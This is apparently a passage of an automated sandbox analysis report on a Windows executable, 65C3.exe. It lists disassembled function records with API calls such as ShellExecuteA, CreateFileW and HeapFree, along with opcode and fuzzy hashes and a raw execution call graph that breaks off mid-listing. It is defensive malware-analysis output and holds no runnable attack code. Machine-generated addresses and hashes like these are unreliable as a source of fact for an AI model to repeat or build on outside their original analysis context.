                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF08672600116BBCB705F66C80889BFFADFF542A43004150F9DAC6420EB31E951DBD1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(01045020,00000000,010768E8,00000000,01045020,?,01065757,01045020,00000001,01045020,01045020,?,01062B7F,00000000,?,01045020), ref: 01066057
                                                                                                                                                                                      • GetLastError.KERNEL32(?,01065757,01045020,00000001,01045020,01045020,?,01062B7F,00000000,?,01045020,00000000,01045020,?,010630D3,01045020), ref: 01066063
                                                                                                                                                                                        • Part of subcall function 01066029: CloseHandle.KERNEL32(FFFFFFFE,01066073,?,01065757,01045020,00000001,01045020,01045020,?,01062B7F,00000000,?,01045020,00000000,01045020), ref: 01066039
                                                                                                                                                                                      • ___initconout.LIBCMT ref: 01066073
                                                                                                                                                                                        • Part of subcall function 01065FEB: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0106601A,01065744,01045020,?,01062B7F,00000000,?,01045020,00000000), ref: 01065FFE
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(01045020,00000000,010768E8,00000000,?,01065757,01045020,00000001,01045020,01045020,?,01062B7F,00000000,?,01045020,00000000), ref: 01066088
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                                                                      • Opcode ID: 63c0af8219e7c3ebf34ab5a87e0ecb2d4eaa3d0fe93264819908f84154fcd22a
                                                                                                                                                                                      • Instruction ID: 5fd2bda17ea2185e0c212249d744a246fe13247d382fb6c5aaa65e8513a22dfa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 63c0af8219e7c3ebf34ab5a87e0ecb2d4eaa3d0fe93264819908f84154fcd22a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 45F0303A804219BBDF725F95DC0CA8E3F7AFF093A0B044424FA9995120C63399A0DB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SleepConditionVariableCS.KERNELBASE(?,01056E07,00000064), ref: 01056E8D
                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(01079708,000000FF,?,01056E07,00000064,?,?,?,01043CC0,0107C468,B75E99D0,?,00000000,010684B8,000000FF), ref: 01056E97
                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,01056E07,00000064,?,?,?,01043CC0,0107C468,B75E99D0,?,00000000,010684B8,000000FF), ref: 01056EA8
                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(01079708,?,01056E07,00000064,?,?,?,01043CC0,0107C468,B75E99D0,?,00000000,010684B8,000000FF), ref: 01056EAF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3269011525-0
                                                                                                                                                                                      • Opcode ID: 856da3165de0999ba50ec477691e4580bf1ab600b5d42fe341cdf37ae0184301
                                                                                                                                                                                      • Instruction ID: 3cf5709a886e0423ed4fa1a752d22d5ae703a3961c2ebe015afd81b759c7a5b9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 856da3165de0999ba50ec477691e4580bf1ab600b5d42fe341cdf37ae0184301
                                                                                                                                                                                      • Instruction Fuzzy Hash: F2E01235941224EBCB215F55EC099CEBE65FB08B76B000010FAC56A124CB676951DBD5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 0105C574
                                                                                                                                                                                        • Part of subcall function 0105D301: HeapFree.KERNEL32(00000000,00000000,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?), ref: 0105D317
                                                                                                                                                                                        • Part of subcall function 0105D301: GetLastError.KERNEL32(?,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?,?), ref: 0105D329
                                                                                                                                                                                      • _free.LIBCMT ref: 0105C587
                                                                                                                                                                                      • _free.LIBCMT ref: 0105C598
                                                                                                                                                                                      • _free.LIBCMT ref: 0105C5A9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 5536a7c603c2d4cade814322d9837cc72272db92743a389b669a79f35deb9455
                                                                                                                                                                                      • Instruction ID: d87157997179e12390023acd69ac0c9f34a49de77f25c3d46c78001844e81174
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5536a7c603c2d4cade814322d9837cc72272db92743a389b669a79f35deb9455
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1E0B6B1D11626DECF736F56FA44CCE3AA2A7947243064407F8E473219EA3F0596ABC1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\65C3.exe
                                                                                                                                                                                      • API String ID: 0-3175184710
                                                                                                                                                                                      • Opcode ID: ce5a11bfa67914d8893c17e28b9f979cd67e4f7d8b7d3dd68eccc398947db1b7
                                                                                                                                                                                      • Instruction ID: 75e3834b19870a2455f85ab7dcdab0d220e910038f633227b262559febc15197
                                                                                                                                                                                      • Opcode Fuzzy Hash: ce5a11bfa67914d8893c17e28b9f979cd67e4f7d8b7d3dd68eccc398947db1b7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 65419771E0021DAFDBA1EB9DC884DEFBFF9EB95310F1040A6E981E7201DA71AA40D754
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 01058C52
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                      • Opcode ID: d8857b4b6af59a00503abba57d58b36f41bbcdd51cf9cf5d8518ae1c826cabd7
                                                                                                                                                                                      • Instruction ID: 5bb7b6b18201ebd686230ecbff728facb2153d9762e8b894f695577b89135ed8
                                                                                                                                                                                      • Opcode Fuzzy Hash: d8857b4b6af59a00503abba57d58b36f41bbcdd51cf9cf5d8518ae1c826cabd7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6441597190020DAFDF56DF99C980AEEBBF5BF58304F18819AFE4467221D3359950DB60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01051DB0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                      • String ID: 5120$H
                                                                                                                                                                                      • API String ID: 514040917-2391956277
                                                                                                                                                                                      • Opcode ID: 7b1dc3dbe51b48b4ff8d344832920c6c62072ce74688bebb39cc37221a3f9df4
                                                                                                                                                                                      • Instruction ID: 14c20eb2eedee8e2107b6942e0688838cf7cac9f2774db5362f571208e6f326a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b1dc3dbe51b48b4ff8d344832920c6c62072ce74688bebb39cc37221a3f9df4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F21AFB4900348DBDB54EF28CA167DE7FB4AB16704F5405CCD98917281D7759B488BE3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:11.8%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:3.3%
                                                                                                                                                                                      Total number of Nodes:1477
                                                                                                                                                                                      Total number of Limit Nodes:72
                                                                                                                                                                                      execution_graph 20710 11791d7 20747 1185760 20710->20747 20712 11791ec 20761 1172be0 20712->20761 20715 1185760 27 API calls 20716 1179215 20715->20716 20717 1172be0 42 API calls 20716->20717 20718 1179220 20717->20718 20719 1185760 27 API calls 20718->20719 20720 1179239 20719->20720 20774 11751e0 20720->20774 20723 1185760 27 API calls 20724 117925b 20723->20724 20725 1172be0 42 API calls 20724->20725 20726 1179266 20725->20726 20785 1185c10 20726->20785 20728 117927a 20729 1185c10 27 API calls 20728->20729 20730 117928e 20729->20730 20793 1185d10 20730->20793 20732 11792a2 20733 1185c10 27 API calls 20732->20733 20734 11792b2 20733->20734 20735 1185760 27 API calls 20734->20735 20736 11792d0 20735->20736 20737 1172be0 42 API calls 20736->20737 20738 11792d7 20737->20738 20797 1185ac0 20738->20797 20740 11792fa 20810 1173990 20740->20810 20742 1179779 20845 118b98e 20742->20845 20746 1179303 20746->20742 20838 1186cc2 20746->20838 20748 1185786 20747->20748 20749 118578d 20748->20749 20750 11857e1 20748->20750 20751 11857c2 20748->20751 20749->20712 20755 11870b4 27 API calls 20750->20755 20759 11857d6 __wsopen_s 20750->20759 20752 1185819 20751->20752 20753 11857c9 20751->20753 20864 1172150 27 API calls 2 library calls 20752->20864 20850 11870b4 20753->20850 20755->20759 20757 11857cf 20758 118b98e 25 API calls 20757->20758 20757->20759 20760 1185823 20758->20760 20759->20712 20881 11729b0 20761->20881 20767 1172c4b 20768 1172cfb 20767->20768 20770 1172cd5 20767->20770 20769 118b98e 25 API calls 20768->20769 20772 1172d00 20769->20772 20771 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20770->20771 20773 1172cf7 20771->20773 20773->20715 20775 117534a 20774->20775 20782 1175238 20774->20782 20775->20723 20776 1185760 27 API calls 20776->20782 20777 1172be0 42 API calls 20777->20782 20778 1175380 20905 1185c00 27 API calls 20778->20905 20779 1185ac0 27 API calls 20779->20782 20781 1175385 20783 118b98e 25 API calls 20781->20783 20782->20775 20782->20776 20782->20777 20782->20778 20782->20779 20782->20781 20784 117538a 20783->20784 20786 1185c38 20785->20786 20787 1185c82 20785->20787 20786->20787 20788 1185c41 20786->20788 20789 1185c91 __InternalCxxFrameHandler 20787->20789 20907 1186460 27 API calls 2 library calls 20787->20907 20906 11868c0 27 API calls 2 library calls 20788->20906 20789->20728 20792 1185c4a 20792->20728 20794 1185d29 20793->20794 20796 1185d3d __InternalCxxFrameHandler 20794->20796 20908 1186460 27 API calls 2 library calls 20794->20908 20796->20732 20799 1185ade __InternalCxxFrameHandler 20797->20799 20800 1185b04 20797->20800 20798 1185bee 20909 1172150 27 API calls 2 library calls 20798->20909 20799->20740 20800->20798 20802 1185b58 20800->20802 20803 1185b7d 20800->20803 20802->20798 20805 11870b4 27 API calls 20802->20805 20806 11870b4 27 API calls 20803->20806 20808 1185b69 __wsopen_s 20803->20808 20804 1185bf8 20805->20808 20806->20808 20807 118b98e 25 API calls 20807->20798 20808->20807 20809 1185bd0 20808->20809 20809->20740 20811 11739cb 20810->20811 20812 1185ac0 27 API calls 20811->20812 20813 1173a08 ShellExecuteA 20812->20813 20814 1173a46 20813->20814 20815 1173aec 20814->20815 20816 118b98e 25 API calls 20814->20816 20815->20746 20817 1173b0d 20816->20817 20818 1185760 27 API calls 20817->20818 20819 1173b45 20818->20819 20820 1185760 27 API calls 20819->20820 20821 1173b58 20820->20821 20822 1185760 27 API calls 20821->20822 20823 1173b68 20822->20823 20824 1185760 27 API calls 20823->20824 20825 1173b7d 20824->20825 20826 1185760 27 API calls 20825->20826 20827 1173b92 20826->20827 20828 1185760 27 API calls 20827->20828 20829 1173ba4 20828->20829 20830 1173990 27 API calls 20829->20830 20835 1173bad 20830->20835 20831 1173c67 20834 118b98e 25 API calls 20831->20834 20832 1173c3f 20833 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20832->20833 20836 1173c61 20833->20836 20837 1173c6c 20834->20837 20835->20831 20835->20832 20836->20746 20839 1186ccb 20838->20839 20840 1186ccd IsProcessorFeaturePresent 20838->20840 20839->20742 20842 1186ef4 20840->20842 20910 1186eb8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20842->20910 20844 1186fd7 20844->20742 20911 118b91a 25 API calls 2 library calls 20845->20911 20847 118b99d 20912 118b9ab IsProcessorFeaturePresent 20847->20912 20849 118b9aa 20852 11870b9 20850->20852 20853 11870d3 20852->20853 20855 11870d5 20852->20855 20865 118b9df 20852->20865 20874 118b9f9 EnterCriticalSection LeaveCriticalSection _unexpected 20852->20874 20853->20757 20856 1172150 Concurrency::cancel_current_task 20855->20856 20857 11870df 20855->20857 20872 1188133 RaiseException 20856->20872 20875 1188133 RaiseException 20857->20875 20860 117216c 20873 1187ef8 26 API calls 2 library calls 20860->20873 20861 11877ac 20863 1172193 20863->20757 20864->20757 20870 118d7ea _unexpected 20865->20870 20866 118d828 20877 118b4a2 20866->20877 20867 118d813 RtlAllocateHeap 20869 118d826 20867->20869 20867->20870 20869->20852 20870->20866 20870->20867 20876 118b9f9 EnterCriticalSection LeaveCriticalSection _unexpected 20870->20876 20872->20860 20873->20863 20874->20852 20875->20861 20876->20870 20880 118dd49 14 API calls 2 library calls 20877->20880 20879 118b4a7 20879->20869 20880->20879 20901 1185980 27 API calls 2 library calls 20881->20901 20883 11729da 20884 1172a50 20883->20884 20902 1185980 27 API calls 2 library calls 20884->20902 20886 1172bb6 20889 11726d0 20886->20889 20888 1172a84 20888->20886 20903 118ac50 40 API calls __fassign 20888->20903 20890 11870b4 27 API calls 20889->20890 20900 1172770 20890->20900 20891 1172956 20892 117297c 20891->20892 20894 11729a6 20891->20894 20893 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20892->20893 20895 117299f 20893->20895 20896 118b98e 25 API calls 20894->20896 20895->20767 20898 11729ab 20896->20898 20897 1185ac0 27 API calls 20897->20900 20900->20891 20900->20894 20900->20897 20904 11868c0 27 API calls 2 library calls 20900->20904 20901->20883 20902->20888 20903->20888 20904->20900 20906->20792 20907->20789 20908->20796 20909->20804 20910->20844 20911->20847 20913 118b9b7 20912->20913 20916 118b7d2 20913->20916 20917 118b7ee ___scrt_fastfail 20916->20917 20918 118b81a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 20917->20918 20921 118b8eb ___scrt_fastfail 20918->20921 20919 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20920 118b909 GetCurrentProcess TerminateProcess 20919->20920 20920->20849 20921->20919 20922 118d15f 20927 118cf35 20922->20927 20926 118d19e 20928 118cf54 20927->20928 20929 118cf67 20928->20929 20938 118cf7c 20928->20938 20930 118b4a2 _free 14 API calls 20929->20930 20931 118cf6c 20930->20931 20947 118b97e 25 API calls __wsopen_s 20931->20947 20933 118d09c 20934 118cf77 20933->20934 20935 118b4a2 _free 14 API calls 20933->20935 20934->20926 20944 1192341 20934->20944 20936 118d14d 20935->20936 20951 118b97e 25 API calls __wsopen_s 20936->20951 20938->20933 20948 1191bd0 37 API calls 2 library calls 20938->20948 20940 118d0ec 20940->20933 20949 1191bd0 37 API calls 2 library calls 20940->20949 20942 118d10a 20942->20933 20950 1191bd0 37 API calls 2 library calls 20942->20950 20952 1191d06 20944->20952 20947->20934 20948->20940 20949->20942 20950->20933 20951->20934 20954 1191d12 __FrameHandler3::FrameUnwindToState 20952->20954 20953 1191d19 20955 118b4a2 _free 14 API calls 20953->20955 20954->20953 20956 1191d44 20954->20956 20957 1191d1e 20955->20957 20963 11922d3 20956->20963 20972 118b97e 25 API calls __wsopen_s 20957->20972 20962 1191d28 20962->20926 20974 118aa80 20963->20974 20968 1192309 20970 1191d68 20968->20970 21029 118d301 20968->21029 20973 1191d9b LeaveCriticalSection __wsopen_s 20970->20973 20972->20962 20973->20962 21035 118a9fd 20974->21035 20977 118aaa4 20979 118a9e0 20977->20979 21047 118a92e 20979->21047 20982 1192361 21071 11920af 20982->21071 20985 11923ac 21088 118ec2d 20985->21088 20986 1192393 21102 118b48f 14 API calls _free 20986->21102 20990 11923ba 21103 118b48f 14 API calls _free 20990->21103 20991 11923d1 21101 119201a CreateFileW 20991->21101 20992 118b4a2 _free 14 API calls 21019 11923a5 20992->21019 20995 11923bf 20996 118b4a2 _free 14 API calls 20995->20996 21005 1192398 20996->21005 20997 1192487 GetFileType 20998 11924d9 20997->20998 20999 1192492 GetLastError 20997->20999 21107 118eb78 15 API calls 3 library calls 20998->21107 21106 118b46c 14 API calls 2 library calls 20999->21106 21000 119245c GetLastError 21105 118b46c 14 API calls 2 library calls 21000->21105 21001 119240a 21001->20997 21001->21000 21104 119201a CreateFileW 21001->21104 21005->20992 21006 11924a0 CloseHandle 21006->21005 21009 11924c9 21006->21009 21008 119244f 21008->20997 21008->21000 21011 118b4a2 _free 14 API calls 21009->21011 21010 11924fa 21012 1192546 21010->21012 21108 1192229 71 API calls 3 library calls 21010->21108 21013 11924ce 21011->21013 21017 119254d 21012->21017 21110 1191dc7 71 API calls 2 library calls 21012->21110 21013->21005 21016 119257b 21016->21017 21018 1192589 21016->21018 21109 118d454 28 API calls 2 library calls 21017->21109 21018->21019 21021 1192605 CloseHandle 21018->21021 21019->20968 21111 119201a CreateFileW 21021->21111 21023 1192630 21024 119263a GetLastError 21023->21024 21028 1192554 21023->21028 21112 118b46c 14 API calls 2 library calls 21024->21112 21026 1192646 21113 118ed40 15 API calls 3 library calls 21026->21113 21028->21019 21030 118d335 _free 21029->21030 21031 118d30c HeapFree 21029->21031 21030->20970 21031->21030 21032 118d321 21031->21032 21033 118b4a2 _free 12 API calls 21032->21033 21034 118d327 GetLastError 21033->21034 21034->21030 21036 118aa1d 21035->21036 21037 118aa14 21035->21037 21036->21037 21044 118dbf2 37 API calls 3 library calls 21036->21044 21037->20977 21043 118e039 5 API calls __wsopen_s 21037->21043 21039 118aa3d 21045 118e2ee 37 API calls __fassign 21039->21045 21041 118aa53 21046 118e31b 37 API calls __fassign 21041->21046 21043->20977 21044->21039 21045->21041 21046->21037 21048 118a93c 21047->21048 21049 118a956 21047->21049 21065 118aabf 14 API calls _free 21048->21065 21051 118a97c 21049->21051 21052 118a95d 21049->21052 21067 118d838 MultiByteToWideChar 21051->21067 21056 118a946 21052->21056 21066 118aad9 15 API calls __wsopen_s 21052->21066 21055 118a98b 21057 118a992 GetLastError 21055->21057 21058 118a9b8 21055->21058 21069 118aad9 15 API calls __wsopen_s 21055->21069 21056->20968 21056->20982 21068 118b46c 14 API calls 2 library calls 21057->21068 21058->21056 21070 118d838 MultiByteToWideChar 21058->21070 21062 118a99e 21063 118b4a2 _free 14 API calls 21062->21063 21063->21056 21064 118a9cf 21064->21056 21064->21057 21065->21056 21066->21056 21067->21055 21068->21062 21069->21058 21070->21064 21072 11920d0 21071->21072 21073 11920ea 21071->21073 21072->21073 21075 118b4a2 _free 14 API calls 21072->21075 21114 119203f 21073->21114 21076 11920df 21075->21076 21121 118b97e 25 API calls __wsopen_s 21076->21121 21078 1192122 21079 1192151 21078->21079 21082 118b4a2 _free 14 API calls 21078->21082 21080 11921a4 21079->21080 21123 118c721 25 API calls 2 library calls 21079->21123 21080->20985 21080->20986 21083 1192146 21082->21083 21122 118b97e 25 API calls __wsopen_s 21083->21122 21085 119219f 21085->21080 21086 118b9ab __wsopen_s 11 API calls 21085->21086 21087 1192228 21086->21087 21089 118ec39 __FrameHandler3::FrameUnwindToState 21088->21089 21125 118cc03 EnterCriticalSection 21089->21125 21091 118ec65 21129 118ea07 21091->21129 21095 118ec40 21095->21091 21097 118ecd4 EnterCriticalSection 21095->21097 21099 118ec87 21095->21099 21098 118ece1 LeaveCriticalSection 21097->21098 21097->21099 21098->21095 21126 118ed37 21099->21126 21101->21001 21102->21005 21103->20995 21104->21008 21105->21005 21106->21006 21107->21010 21108->21012 21109->21028 21110->21016 21111->21023 21112->21026 21113->21028 21116 1192057 21114->21116 21115 1192072 21115->21078 21116->21115 21117 118b4a2 _free 14 API calls 21116->21117 21118 1192096 21117->21118 21124 118b97e 25 API calls __wsopen_s 21118->21124 21120 11920a1 21120->21078 21121->21073 21122->21079 21123->21085 21124->21120 21125->21095 21137 118cc4b LeaveCriticalSection 21126->21137 21128 118eca7 21128->20990 21128->20991 21138 118f5d6 21129->21138 21131 118ea19 21135 118ea26 21131->21135 21145 118e1b4 6 API calls _unexpected 21131->21145 21132 118d301 _free 14 API calls 21133 118ea7b 21132->21133 21133->21099 21136 118eb55 EnterCriticalSection 21133->21136 21135->21132 21136->21099 21137->21128 21143 118f5e3 _unexpected 21138->21143 21139 118f623 21142 118b4a2 _free 13 API calls 21139->21142 21140 118f60e RtlAllocateHeap 21141 118f621 21140->21141 21140->21143 21141->21131 21142->21141 21143->21139 21143->21140 21146 118b9f9 EnterCriticalSection LeaveCriticalSection _unexpected 21143->21146 21145->21131 21146->21143 21147 1181050 21148 1185ac0 27 API calls 21147->21148 21149 118108d 21148->21149 21150 1182060 21149->21150 21151 1185ac0 27 API calls 21149->21151 21385 1185c00 27 API calls 21150->21385 21153 11810e2 21151->21153 21153->21150 21156 1185ac0 27 API calls 21153->21156 21154 1182065 21386 1185c00 27 API calls 21154->21386 21158 1181132 21156->21158 21157 118206a 21159 118b98e 25 API calls 21157->21159 21158->21150 21160 118115d 21158->21160 21161 118206f 21159->21161 21163 1185ac0 27 API calls 21160->21163 21162 118b98e 25 API calls 21161->21162 21164 1182074 21162->21164 21165 1181180 21163->21165 21387 1185c00 27 API calls 21164->21387 21167 1185760 27 API calls 21165->21167 21168 1181193 21167->21168 21170 1172be0 42 API calls 21168->21170 21169 1182079 21171 118b98e 25 API calls 21169->21171 21175 118119e 21170->21175 21172 118207e 21171->21172 21388 1186c62 27 API calls 2 library calls 21172->21388 21174 1182088 21176 118b98e 25 API calls 21174->21176 21175->21154 21177 11811f5 21175->21177 21178 118208d 21176->21178 21179 1185ac0 27 API calls 21177->21179 21180 1182097 21178->21180 21389 1186ca2 27 API calls 2 library calls 21178->21389 21183 1181219 21179->21183 21182 118b98e 25 API calls 21180->21182 21182->21180 21183->21157 21184 118124d 21183->21184 21276 1176d20 21184->21276 21187 1185760 27 API calls 21188 1181294 21187->21188 21189 1172be0 42 API calls 21188->21189 21191 118129f 21189->21191 21190 1181626 21190->21174 21193 1181767 21190->21193 21192 1185ac0 27 API calls 21191->21192 21198 11812f6 21192->21198 21193->21180 21194 118203a 21193->21194 21195 1186cc2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21194->21195 21197 118205c 21195->21197 21196 1181373 21199 1185760 27 API calls 21196->21199 21235 11814af 21196->21235 21198->21161 21198->21196 21202 118139a 21199->21202 21200 118b4a2 _free 14 API calls 21201 11814be 21200->21201 21287 118b76a 21201->21287 21202->21164 21204 11813c8 21202->21204 21206 1185ac0 27 API calls 21204->21206 21208 11813f4 21206->21208 21207 11814f8 21207->21178 21207->21190 21211 118176c 21207->21211 21212 1181511 21207->21212 21213 1181871 21207->21213 21209 11726d0 27 API calls 21208->21209 21210 1181408 21209->21210 21378 1172540 27 API calls 21210->21378 21218 1185ac0 27 API calls 21211->21218 21217 1185ac0 27 API calls 21212->21217 21215 1185ac0 27 API calls 21213->21215 21219 1181899 21215->21219 21216 1181417 21379 11856a0 21216->21379 21221 1181539 21217->21221 21222 1181794 21218->21222 21223 1185ac0 27 API calls 21219->21223 21224 1185ac0 27 API calls 21221->21224 21225 1185ac0 27 API calls 21222->21225 21226 11818c5 21223->21226 21227 1181565 21224->21227 21228 11817c0 21225->21228 21229 1185760 27 API calls 21226->21229 21231 1185760 27 API calls 21227->21231 21232 1185760 27 API calls 21228->21232 21234 11818e3 21229->21234 21230 1181426 21230->21169 21230->21235 21236 1181583 21231->21236 21233 11817de 21232->21233 21237 1172be0 42 API calls 21233->21237 21238 1172be0 42 API calls 21234->21238 21235->21200 21239 1172be0 42 API calls 21236->21239 21240 11817e5 21237->21240 21241 11818ea 21238->21241 21242 118158a 21239->21242 21243 1185760 27 API calls 21240->21243 21244 